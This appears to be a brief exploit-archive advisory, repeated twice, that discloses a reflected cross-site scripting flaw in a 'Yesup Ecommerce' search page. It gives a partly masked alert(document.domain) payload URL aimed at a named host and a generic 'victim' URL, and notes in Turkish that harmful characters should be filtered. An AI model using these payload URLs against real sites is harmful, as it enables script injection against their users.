endLesS
Webmaster
< ------------------- header data start ------------------- >
# Application Name: Yesup Ecommerce Cross Site Scripting Vulnerability
# Author: expulse ~ Bug Researchers
# Date: 27.06.2011
# Example: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=**********alert(document.domain)</script>
# Vulnerable Type: Reflected XSS
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/yesupSearch/web.php?q=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
# Application Name: Yesup Ecommerce Cross Site Scripting Vulnerability
# Author: expulse ~ Bug Researchers
# Date: 27.06.2011
# Example: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=**********alert(document.domain)</script>
# Vulnerable Type: Reflected XSS
# Fixed: Zararlı Karakterler Filitrelenmelidir.
< -- bug code start -- >
http://victim/yesupSearch/web.php?q=XSSAttack]
< -- bug code end of -- >
< ------------------- header data end of ------------------- >